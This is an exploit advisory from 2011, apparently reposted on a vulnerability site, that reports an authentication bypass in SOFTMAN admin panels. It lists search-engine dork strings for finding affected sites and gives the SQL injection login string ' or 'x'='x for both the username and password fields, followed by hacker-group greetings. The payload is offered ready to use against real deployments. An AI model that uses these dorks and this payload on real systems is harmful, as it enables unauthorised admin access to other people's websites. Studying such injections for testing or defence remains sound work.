SOFTMAN Admin (Auth Bypass) SQl Injection Vulnerability

2011.03.10
Credit: eXeSoul
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

&#65279;################################################################## # Title : SOFTMAN Admin (Auth Bypass) SQl Injection Vulnerability # # Author: eXeSoul # # Home : www.indishell.in or www.andhrahackers.com # # Email : exe.soul@live.com # # date : 7/3/2011 # # D0rk : [i] "Powered by SOFTMAN" # [ii] "Powered by Softman Multitech Pvt Ltd" # [iii] "All Rights reserved by SOFTMAN" ################################################################## ################################################################## # # Script Vendor: http://www.softman-pk.com # ################################################################## #################################################################### # # # # Go To Admin Panel :- # # Login With this information :- # # Admin :- ' or 'x'='x # # password :- ' or 'x'='x # #################################################################### -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= <3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, Th3 RDX, G00g!3 W@rr!0r, Nazz ,r45c4l, str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor , Bon3 , Badboy-Albinia, Mr.SK , I-H Guru,X__HMG, AK-47, [ICW] [Andhra Hackers], Ethical N00b, [Indishell crew] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #################################################################### # # Bug discovered : 07 March 2011 #################################################################### # # Jay Mahadev.!! Jay shree Ram.!! jay Shree krishna.!! Jay hind.!! # #################################################################### # # # exploit-db.com [07-3-2011] ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top